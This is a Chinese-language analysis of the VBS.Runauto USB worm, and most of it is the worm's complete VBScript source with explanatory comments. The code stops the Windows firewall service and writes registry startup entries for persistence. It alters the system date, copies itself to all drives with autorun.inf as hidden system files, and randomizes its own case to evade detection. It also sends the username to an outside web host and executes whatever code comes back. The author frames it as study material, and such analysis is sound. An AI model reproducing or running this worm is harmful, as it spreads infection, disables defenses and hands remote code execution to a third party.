VBS.Runauto腳本病毒是我們俗稱的U盤病毒的一種，Symantec公司給其定位為蠕蟲（Worm）病毒躲因，雖然危害性遠(yuǎn)不如一些惡性病毒早敬，但常常會(huì)嚴(yán)重影響用戶正常使用計(jì)算機(jī)。

腳本概覽

Symantec對(duì)該病毒的簡(jiǎn)介

源碼分析

由于在網(wǎng)上找了很久也沒有找到該病毒的樣本大脉，只能參考網(wǎng)上的分析文章中所公布出來(lái)的源碼進(jìn)行分析搞监，意在分析病毒的大體函數(shù)調(diào)用，作學(xué)習(xí)之用镰矿。

 
On Error Resume Next 
Set fso=CreateObject("scripting.filesystemobject") 
Set wshshell=CreateObject(strreverse("wscript.shell")) 
Dim dri_list,dri_list0 
Dim issend 
issend=0 
c_time=Date() 

' 這是關(guān)閉SharedAccess(Intemet連接共享和防火墻服務(wù))' 
wshshell.run "net stop sharedaccess",0 

Set drvs=fso.drives 
sysdir=fso.GetSpecialFolder(1) 
'WindowsFolder=0,SystemFolder=1, TemporaryFolder=2 '

thispath=wscript.ScriptFullName 
Set fc=fso.OpenTextFile(thispath,1) 
'ForReading=1,ForWriting=2 ,ForAppending=8 '

scopy=fc.readall 
fc.Close 

Set fc=Nothing 
' 寫注冊(cè)表注冊(cè)文件sysinfo.reg琐驴，注冊(cè)系統(tǒng)開機(jī)自動(dòng)執(zhí)行病毒 '
Call writefile(sysdir&"\sysinfo.reg","windows registry editor version 5.00 [hkey_local_machine\software\policies\microsoft\windows\system\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [hkey_local_machine\software\microsoft\windows\currentversion\group policy\state\machine\scripts\startup\0\0] "script"="%windir%\\system32\\prncfg.vbs" "parameters"="" "exectime"=hex(b):00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 
") 
' 導(dǎo)入注冊(cè)表sysinfo.reg '
wshshell.run "regedit /s sysinfo.reg" , 0 
wscript.sleep 200 
fso.deletefile sysdir&"\sysinfo.reg" , True 

' 如果當(dāng)前運(yùn)行腳本在系統(tǒng)目錄中' 
If InStr(thispath,sysdir)>0 Then 
dri_list0=listdrv() 
o_time=left(c_time,3)&cstr(Int(Mid(c_time,4,1))-1)&Right(c_time,Len(c_time)-4) 
'回?fù)軙r(shí)間1年 '
wshshell.run "cmd /c Date" &o_time,0 
wscript.sleep 10000 
For dri_i=1 to Len(dri_list0) 
Call writeauto(Mid(dri_list0,dri_i,1)& ":\" ) 
Next 
wshshell.run "cmd /c Date "&c_time,0 


 'WMI應(yīng)用查詢計(jì)算機(jī)名，用戶名'
computername="":username=""
Set objwmiservice=GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") 
Set colcomputers = objwmiservice.execquery("select * from win32_computersystem") 
For Each objcomputer in colcomputers 
computername=objcomputer.name 
username=objcomputer.username 
Next 
If username="" Then username="evar" 
If InStr(username,"\")<=0 Then 
username=computername&"\"&username 
End If 
do 
If issend=0 Then 
' 鏈接外網(wǎng)，獲得執(zhí)行代碼 
Set xml=CreateObject("msxml2.serverxmlhttp") 
xml.open "get","http://202.119.104.100/zzb/eva/count.asp?a="&username,0 
' http://202.119.104.100/zzb/是南師大學(xué)校黨委組織部主辦的網(wǎng)站 
xml.setrequestheader "user-agent","evar" 
xml.send() 
If Err.number=0 Then 
issend=1 
res=xml.responsetext 
If ucase(left(res,7))=ucase("Execute") Then Execute res 
Else 
Err.clear 
End If 
Set xml=Nothing 
End If 

dri_list=listdrv() 
For dri_k=1 to Len(dri_list) 
If InStr(dri_list0,Mid(dri_list,dri_k,1))<=0 Then 
Call writeauto(Mid(dri_list,dri_k,1)&":\") 
End If 
Next 
dri_list0=dri_list 
wscript.sleep 1000 
loop 
Else 
wshshell.run "explorer .\",3 
wscript.sleep 2000 
wshshell.appactivate LCase("我的電腦") 
wshshell.sendkeys UCase("% c") ' 模擬擊鍵 alt + space + c 棍矛，其實(shí)就是關(guān)閉窗口 
runflag=0 

' 獲得當(dāng)前系統(tǒng)進(jìn)程安疗，WMI的應(yīng)用 
For each ps in GetObject _ 
("winmgmts:\\.\root\cimv2:win32_process").instances_ 
If lcase(ps.name)=lcase("wscript.exe") Then 
runflag=runflag+1 
End If 
Next 
If runflag>=2 Then wscript.quit 
Set sf=fso.GetFolder(sysdir) 
f_time=Left(sf.datecreated,InStr(sf.datecreated," ")-1) 
wshshell.run "cmd /c Date "&f_time,0 
wscript.sleep 100 
Call writefile(sysdir&lcase("\prncfg.vbs"),vs(scopy)) 
wshshell.run "cmd /c Date "&c_time,0 
wshshell.run sysdir&"\prncfg.vbs" 
End If 

' 混亂字符串,進(jìn)行代碼變體！ 
Function vs(str) 
Execute "For i=1 to Len(str) c=ucase(Mid(str,i,1)) randomize If Int(rnd()*100)>50 Then vs=vs&lcase(c) Else vs=vs&c End If Next vs=replace(vs,ucase("%u"),lcase("%u"))" 
End Function 

' 列出驅(qū)動(dòng)器 
Function listdrv() 
Execute "Dim tmp_list tmp_list="" For each drv in drvs If drv.isready Then tmp_list=tmp_list&drv.driveletter End If Next listdrv=tmp_list" 
End Function 

' 寫autorun.inf文件 
Sub writeauto(path) 
' 寫Auto文件前的準(zhǔn)備够委，如果path中有autorun.inf文件夾那么重命名;如果有autorun.inf文件則刪除 
Execute "If fso.folderexists(path&"autorun.inf") Then fso.movefolder path&"autorun.inf",path&rnd() elseif fso.fileexists(path&"autorun.inf") Then fso.deletefile path&"autorun.inf",true End If" 
' autorun.inf中的啟動(dòng)代碼 
cmdstr="shell\*\command=wscript.exe "&chr(34)&"eva.vbs"&chr(34) 
autostr="[autorun]"&vbcrlf&"open="&vbcrlf&replace(cmdstr,"*","open")&vbcrlf&replace(cmdstr,"*","explore")&vbcrlf&replace(cmdstr,"*","find") 
' 寫入 
Call writefile(path&ucase("autorun.inf"),autostr) 
Call writefile(path&"eva.vbs",vs(scopy)) 
End Sub 
'將content中的內(nèi)容寫入fpath荐类，并設(shè)置文件屬性是ReadOnly、Hidden和System 
Sub writefile(fpath,content) 
Execute "If fso.fileexists(fpath) Then fso.deletefile fpath,true Set fc=fso.OpenTextFile(fpath,2,true) fc.write content fc.Close Set fc=Nothing Set fa=fso.getfile(fpath) fa.attributes=7 Set fa=Nothing" 
End Sub